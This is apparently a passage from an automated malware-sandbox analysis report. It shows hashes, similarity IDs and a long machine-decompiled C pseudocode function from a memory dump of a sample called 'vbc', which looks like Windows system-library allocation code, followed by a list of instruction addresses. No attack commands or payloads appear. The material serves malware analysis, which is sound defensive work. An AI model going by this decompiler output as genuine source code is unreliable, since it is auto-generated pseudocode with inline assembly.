                                                  • Instruction Fuzzy Hash: 87112375D54348DBDB29DFF88D0579DBBB9AB14314F24426EE529AB282C3740602CF18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0164FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0164FF60
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                  • API String ID: 0-1911121157
                                                  • Opcode ID: fa498b430b34887f7816e122290fa8e6b8d64b5229a8c5a7e80bbf2ef7cf3aee
                                                  • Instruction ID: ca04fcad27274342325fcaa59f0763ae447670aae218732cc1d3bf6202369b36
                                                  • Opcode Fuzzy Hash: fa498b430b34887f7816e122290fa8e6b8d64b5229a8c5a7e80bbf2ef7cf3aee
                                                  • Instruction Fuzzy Hash: 0C110071950144EFDB26EF98CD49F99BBB2FF08704F548098F1096B2A1C7399940CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01685BA5 Relevance: .6, Instructions: 592COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E01685BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1691178);
				E0160D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01684C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E015FD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01685542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x16a60e8;
								if( *0x16a60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x16a60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E015F9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E015F6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E015FF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E015FF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E015FF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E015FFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E015FFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E015FF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E015FF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01684CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0160D130(_t427, _t494, _t511);
				}
			}










































































                                                  0x01685ba5
                                                  0x01685baa
                                                  0x01685baf
                                                  0x01685bb4
                                                  0x01685bb6
                                                  0x01685bbc
                                                  0x01685bbe
                                                  0x01685bc4
                                                  0x01685bcd
                                                  0x01685bd3
                                                  0x01685bd6
                                                  0x01685bdc
                                                  0x01685be0
                                                  0x01685be3
                                                  0x01685beb
                                                  0x01685bf2
                                                  0x01685bf8
                                                  0x01685bfe
                                                  0x01685c04
                                                  0x01685c0e
                                                  0x01685c18
                                                  0x01685c1f
                                                  0x01685c25
                                                  0x01685c2a
                                                  0x01685c2c
                                                  0x01685c32
                                                  0x01685c3a
                                                  0x01685c3f
                                                  0x01685c42
                                                  0x01685c48
                                                  0x01685c5b
                                                  0x01685c5b
                                                  0x01685c2c
                                                  0x01685cb7
                                                  0x01685cb9
                                                  0x01685cbf
                                                  0x01685cc2
                                                  0x01685cca
                                                  0x01685ccb
                                                  0x01685ccb
                                                  0x01685cd1
                                                  0x01685cd7
                                                  0x01685cda
                                                  0x01685ce1
                                                  0x01685ce4
                                                  0x01685ce7
                                                  0x01685ced
                                                  0x01685cf3
                                                  0x01685cf9
                                                  0x01685cff
                                                  0x01685d08
                                                  0x01685d0a
                                                  0x01685d0e
                                                  0x01685d10
                                                  0x00000000
                                                  0x00000000
                                                  0x01685d16
                                                  0x01685d1a
                                                  0x00000000
                                                  0x00000000
                                                  0x01685d20
                                                  0x01685d22
                                                  0x01685d25
                                                  0x01685d2f
                                                  0x01685d2f
                                                  0x01685d33
                                                  0x01685d3d
                                                  0x01685d49
                                                  0x01685d4b
                                                  0x00000000
                                                  0x00000000
                                                  0x01685d5a
                                                  0x01685d5d
                                                  0x01685d60
                                                  0x00000000
                                                  0x00000000
                                                  0x01685d66
                                                  0x01685d69
                                                  0x00000000
                                                  0x00000000
                                                  0x01685d6f
                                                  0x01685d6f
                                                  0x01685d73
                                                  0x01685d79
                                                  0x01685d7f
                                                  0x01685d86
                                                  0x01685d95
                                                  0x01685d98
                                                  0x01685dba
                                                  0x01685dcb
                                                  0x01685dce
                                                  0x01685dd3
                                                  0x01685dd6
                                                  0x01685dd8
                                                  0x01685de6
                                                  0x01685dec
                                                  0x01685dee
                                                  0x01685df1
                                                  0x01685df3
                                                  0x0168635a
                                                  0x0168635a
                                                  0x00000000
                                                  0x0168635a
                                                  0x01685dfe
                                                  0x01685e02
                                                  0x01685e05
                                                  0x01685e07
                                                  0x01685e10
                                                  0x01685e13
                                                  0x01685e1b
                                                  0x01685e1c
                                                  0x01685e21
                                                  0x01685e22
                                                  0x01685e23
                                                  0x01685e25
                                                  0x01685e2a
                                                  0x01685e2c
                                                  0x01685e2e
                                                  0x01685e36
                                                  0x01685e39
                                                  0x01685e42
                                                  0x01685e47
                                                  0x01685e4d
                                                  0x01685e54
                                                  0x01685e54
                                                  0x01685e54
                                                  0x01685e2e
                                                  0x01685e5c
                                                  0x01685e5f
                                                  0x01685e62
                                                  0x01685e64
                                                  0x01685e6b
                                                  0x01685e70
                                                  0x01685e7a
                                                  0x01685e7a
                                                  0x01685e7a
                                                  0x01685e6b
                                                  0x01685e7e
                                                  0x01685e7f
                                                  0x01685e7f
                                                  0x01685e81
                                                  0x01685e87
                                                  0x01685e8b
                                                  0x01685e8c
                                                  0x01685e8c
                                                  0x01685e8c
                                                  0x01685e9a
                                                  0x01685e9c
                                                  0x01685ea2
                                                  0x01685ea6
                                                  0x01685f50
                                                  0x01685f50
                                                  0x01685f57
                                                  0x01685f66
                                                  0x01685f66
                                                  0x01685f66
                                                  0x01685f68
                                                  0x01685f6a
                                                  0x016863d0
                                                  0x00000000
                                                  0x01685f70
                                                  0x01685f70
                                                  0x01685f91
                                                  0x01685f9c
                                                  0x01685f9e
                                                  0x01685fa4
                                                  0x01685fa6
                                                  0x0168638c
                                                  0x01686392
                                                  0x016863a1
                                                  0x016863a7
                                                  0x016863af
                                                  0x016863af
                                                  0x016863bd
                                                  0x016863d8
                                                  0x00000000
                                                  0x016863d8
                                                  0x01685fac
                                                  0x01685fb2
                                                  0x01685fb4
                                                  0x01685fbd
                                                  0x01685fc6
                                                  0x01685fce
                                                  0x01685fd4
                                                  0x01685fdc
                                                  0x01685fec
                                                  0x01685fed
                                                  0x01685fee
                                                  0x01685fef
                                                  0x01685ff9
                                                  0x01685ffa
                                                  0x01685ffb
                                                  0x01685ffc
                                                  0x01686000
                                                  0x01686004
                                                  0x01686012
                                                  0x01686012
                                                  0x01686018
                                                  0x01686019
                                                  0x0168601a
                                                  0x0168601b
                                                  0x0168601c
                                                  0x01686020
                                                  0x01686059
                                                  0x0168605c
                                                  0x01686061
                                                  0x01686061
                                                  0x01686022
                                                  0x01686022
                                                  0x01686022
                                                  0x01686025
                                                  0x0168602a
                                                  0x0168602b
                                                  0x01686031
                                                  0x01686037
                                                  0x01686038
                                                  0x0168603e
                                                  0x01686048
                                                  0x01686049
                                                  0x0168604a
                                                  0x0168604b
                                                  0x0168604c
                                                  0x0168604d
                                                  0x01686053
                                                  0x01686054
                                                  0x01686054
                                                  0x01686062
                                                  0x01686065
                                                  0x01686067
                                                  0x0168606a
                                                  0x01686070
                                                  0x01686075
                                                  0x01686076
                                                  0x01686081
                                                  0x01686087
                                                  0x01686095
                                                  0x01686099
                                                  0x0168609e
                                                  0x016860a4
                                                  0x016860ae
                                                  0x016860b0
                                                  0x016860b3
                                                  0x016860b6
                                                  0x016860b8
                                                  0x016860ba
                                                  0x016860ba
                                                  0x016860ba
                                                  0x016860ba
                                                  0x016860be
                                                  0x016860c0
                                                  0x016860c5
                                                  0x016860c5
                                                  0x016860c5
                                                  0x016860c6
                                                  0x016860cd
                                                  0x01686114
                                                  0x016860cf
                                                  0x016860cf
                                                  0x016860d4
                                                  0x016860d5
                                                  0x016860da
                                                  0x016860db
                                                  0x016860e1
                                                  0x016860e2
                                                  0x016860e8
                                                  0x016860f8
                                                  0x016860fd
                                                  0x016860fe
                                                  0x01686102
                                                  0x01686104
                                                  0x01686107
                                                  0x01686109
                                                  0x0168610b
                                                  0x0168610b
                                                  0x0168610b
                                                  0x0168610b
                                                  0x0168610f
                                                  0x0168610f
                                                  0x01686117
                                                  0x0168611a
                                                  0x0168611f
                                                  0x01686125
                                                  0x01686134
                                                  0x01686139
                                                  0x0168613f
                                                  0x01686146
                                                  0x01686148
                                                  0x0168614b
                                                  0x0168614d
                                                  0x0168614f
                                                  0x0168614f
                                                  0x0168614f
                                                  0x0168614f
                                                  0x01686153
                                                  0x01686159
                                                  0x01686159
                                                  0x0168615c
                                                  0x01686163
                                                  0x01686169
                                                  0x0168616c
                                                  0x01686172
                                                  0x01686181
                                                  0x01686186
                                                  0x01686187
                                                  0x0168618b
                                                  0x01686191
                                                  0x01686195
                                                  0x016861a3
                                                  0x016861bb
                                                  0x016861c0
                                                  0x016861c3
                                                  0x016861cc
                                                  0x016861d0
                                                  0x016861dc
                                                  0x016861de
                                                  0x016861e1
                                                  0x016861e4
                                                  0x016861e6
                                                  0x016861e8
                                                  0x016861e8
                                                  0x016861e8
                                                  0x016861e8
                                                  0x016861e6
                                                  0x016861ec
                                                  0x016861f3
                                                  0x01686203
                                                  0x01686209
                                                  0x0168620a
                                                  0x01686216
                                                  0x0168621d
                                                  0x01686227
                                                  0x01686241
                                                  0x01686246
                                                  0x0168624c
                                                  0x01686257
                                                  0x01686259
                                                  0x0168625c
                                                  0x0168625e
                                                  0x01686260
                                                  0x01686260
                                                  0x01686260
                                                  0x01686260
                                                  0x0168625e
                                                  0x01686264
                                                  0x01686267
                                                  0x01686269
                                                  0x01686315
                                                  0x01686315
                                                  0x0168631b
                                                  0x0168631e
                                                  0x01686324
                                                  0x01686327
                                                  0x0168632f
                                                  0x01686330
                                                  0x01686333
                                                  0x0168633a
                                                  0x0168633c
                                                  0x01686335
                                                  0x01686335
                                                  0x01686335
                                                  0x0168633f
                                                  0x01686342
                                                  0x0168634c
                                                  0x01686352
                                                  0x01686355
                                                  0x01686355
                                                  0x01686359
                                                  0x00000000
                                                  0x0168626f
                                                  0x01686275
                                                  0x01686275
                                                  0x01686278
                                                  0x0168627e
                                                  0x0168627e
                                                  0x01686281
                                                  0x01686287
                                                  0x0168628d
                                                  0x01686298
                                                  0x0168629c
                                                  0x016862a2
                                                  0x0168629e
                                                  0x0168629e
                                                  0x0168629e
                                                  0x016862a7
                                                  0x016862a7
                                                  0x016862aa
                                                  0x016862b0
                                                  0x016862f0
                                                  0x016862f0
                                                  0x016862f2
                                                  0x016862f8
                                                  0x016862fd
                                                  0x016862b2
                                                  0x016862b2
                                                  0x016862b2
                                                  0x016862b5
                                                  0x016862dd
                                                  0x016862e2
                                                  0x016862e5
